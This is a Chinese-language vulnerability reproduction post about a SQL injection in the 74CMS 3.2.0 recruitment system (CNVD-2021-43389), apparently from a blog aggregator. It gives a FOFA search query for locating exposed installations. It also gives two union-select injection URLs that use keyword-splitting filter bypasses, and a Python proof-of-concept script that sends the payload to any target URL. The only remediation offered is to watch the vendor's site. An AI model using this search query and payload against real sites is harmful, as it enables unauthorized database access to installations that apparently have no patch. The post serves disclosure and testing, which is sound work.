74CMS(骑士CMS) 存在SQL注入漏洞(CNVD-2021-43389)
文章目录
- 74CMS(骑士CMS) 存在SQL注入漏洞(CNVD-2021-43389)
- 1.74CMS(骑士CMS)简介
- 2.漏洞描述
- 3.影响版本
- 4.fofa查询语句
- 5.漏洞复现
- 6.POC&EXP
- 7.整改意见
74CMS(骑士CMS) 存在SQL注入漏洞(CNVD-2021-43389)
1.74CMS(骑士CMS)简介
微信公众号搜索:南风漏洞复现文库
南风网络安全公众号首发
74CMS是太原迅易科技有限公司基于ThinkPHP框架二次开发的人才招聘系统。
2.漏洞描述
74CMS是一款基于ThinkPHP框架二次开发的人才招聘系统。 74CMS 3.2.0版本存在SQL注入漏洞。攻击者利用该漏洞可通过plus/ajax_street.php的x参数注入SQL语句。
CNVD-2021-43389
CVE-2020-22208
CNNVD-202106-1336
3.影响版本
74CMS 3.2.0
4.fofa查询语句
app=“骑士-74CMS”
5.漏洞复现
http://192.168.31.246:3003/plus/ajax_officebuilding.php?act=key&key=錦’ a<>nd 1=2 un<>ion sel<>ect 1,2,3,version(),5,6,7,8,9%23
http://192.168.31.246:3003/plus/ajax_officebuilding.php?act=key&key=錦’ a<>nd 1=2 un<>ion sel<>ect 1,2,3,md5(123),5,6,7,8,9%23
6.POC&EXP
用法:poc.py http://127.0.0.1/
#!usr/bin/env python
# *-* coding:utf-8 *-*
import requests
import json
import sys
import urllib3
urllib3.disable_warnings()
def poc(arg):vuln_url = arg + "plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(123),5,6,7,8,9%23"try:r = requests.post(vuln_url,verify=False,timeout=20,allow_redirects=False)if '202cb962ac59075b964b07152d234b70' in r.text:print('存在漏洞:'+vuln_url)except Exception as e:print('出错:'+str(e))passurl=sys.argv[1]
poc(url)
7.整改意见
厂商尚未提供漏洞修复方案,请关注厂商主页更新: http://www.74cms.com/
74CMS(骑士CMS) 存在SQL注入漏洞(CNVD-2021-43389)相关推荐
- sql注入pythonpoco_骑士CMS后台SQL注入 | CN-SEC 中文网
摘要 漏洞文件:admin/admin_feedback.php代码82行: 跟下get_report_list: $_GET['reporttype'] 漏洞文件:admin/admin_feed ...
- wap建站程序_因建站系统存在SQL注入漏洞,国内两家网络公司被CNVD公开点名
2月27日,国家信息安全漏洞共享平台(CNVD)的漏洞列表收录了两个新的SQL注入漏洞--CNVD-2019-04308和CNVD-2019-05341.根据CNVD公布的信息来看,这两个漏洞的危害级 ...
- 【某CMS漏洞】SQL注入漏洞分析
前言 这个CMS非常适合入门代码审计的人去学习,因为代码简单且漏洞成因经典,对一些新手有学习价值, 前台注入 从入口开始:/semcms/Templete/default/Include/index. ...
- Goby 漏洞更新 | 铭飞 CMS list 接口 sqlWhere 参数 sql 注入漏洞
漏洞名称:铭飞 CMS list 接口 sqlWhere 参数 sql 注入漏洞 English Name:MCMS list Interface sqlWhere Sql Injection Vul ...
- 齐博cms最新SQL注入网站漏洞 可远程执行代码提权
齐博cms整站系统,是目前建站系统用的较多的一款CMS系统,开源,免费,第三方扩展化,界面可视化的操作,使用简单,便于新手使用和第二次开发,受到许多站长们的喜欢.开发架构使用的是php语言以及mysq ...
- iCMS后台database.admincp文件存在SQL注入漏洞
iCMS后台database.admincp文件存在SQL注入漏洞 目录 一.漏洞分析 二.漏洞测试 目录 该漏洞CNVD-ID: CNVD-2019-09079 漏洞提交CNVD后,待CNVD公示才 ...
- PHPSHE 1.7前台SQL注入漏洞分析
此CMS SQL注入漏洞产生原因为未将经过 addslashes() 函数过滤的数据使用单引号包裹,从而导致的SQL注入漏洞.接下来看漏洞详情: 首先查看phpshe下的common.php文件37 ...
- 易想团购 注入 user.php,易想购物(easethink)存在sql注入漏洞,附利用测试POC
漏洞概要 缺陷编号:WooYun-2013-022023 漏洞标题:易想购物(easethink)存在sql注入漏洞,附利用测试POC 相关厂商:易想购物 漏洞作者:lxsec 提交时间:2013-0 ...
- Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)漏洞复现
Drupal < 7.32 "Drupalgeddon" SQL注入漏洞 by ADummy 0x00利用路线 Burpsuite抓包改包->信息被爆出 0x01漏 ...
最新文章
- git没有changId解决方法
- Leetcode987 二叉树的垂序遍历
- 学业水平考试网登录_江西2020年下半年普通高中学业水平考试成绩查询时间及入口...
- python安装报错ox000007b_Python沙箱逃逸的n种姿势
- java socket 多次write_java NIO2异步socket的write事件与read事件的完成次数不一致是怎么回事...
- 使用Unoconv和LibreOffice进行格式转换实现在线预览 doc,doxc,xls,xlsx,ppt,pptx 文件
- HTML中光移动边框,CSS 边框各边
- android自定义进度条百分比跟着走,Android studio圆形进度条 百分数跟随变化
- python零基础好学吗-如何从零开始学习Python,零基础学python难吗
- vmware开机自动进入BIOS vmware 进入BIOS方法
- oracle类型介绍,Oracle数字的3种基本类型介绍[转]
- 多张图片合成一个pdf文件的操作方法
- scratch3.0探索000
- 字符串统计(2017)
- 利用AVISPA证明D2D协议
- 【计算机网络】域名解析(DNS)过程
- 【统计学】从样本到总体
- Eclipse---Refreshing /.org.eclipse.jdt.core.external.folders/.link0
- mysql把集群改成单机_nacos单机迁移至集群
- JAVA算法练习(2):振兴中华
热门文章
- 一个可以地址和各种格式的经纬度查询互换的网址,支持百度、高德、Google等地图对比查询。
- Excel 分割汉字和数字
- 朴素贝叶斯朴素在哪里?
- bt宝塔安装mysql 密码过期_Bt(宝塔面板)忘记用户名密码的解决方案
- 帕金森定律(Parkinson's Law)亦称“官场病”或“组织麻痹病”
- 服装行业管理软件的降本增效——RFID
- 移动app实用测试指南
- 云客Drupal源码分析之语言Language
- 从keystore中导出私钥key
- win10 1803官方原版镜像,看不懂我吃 - - -S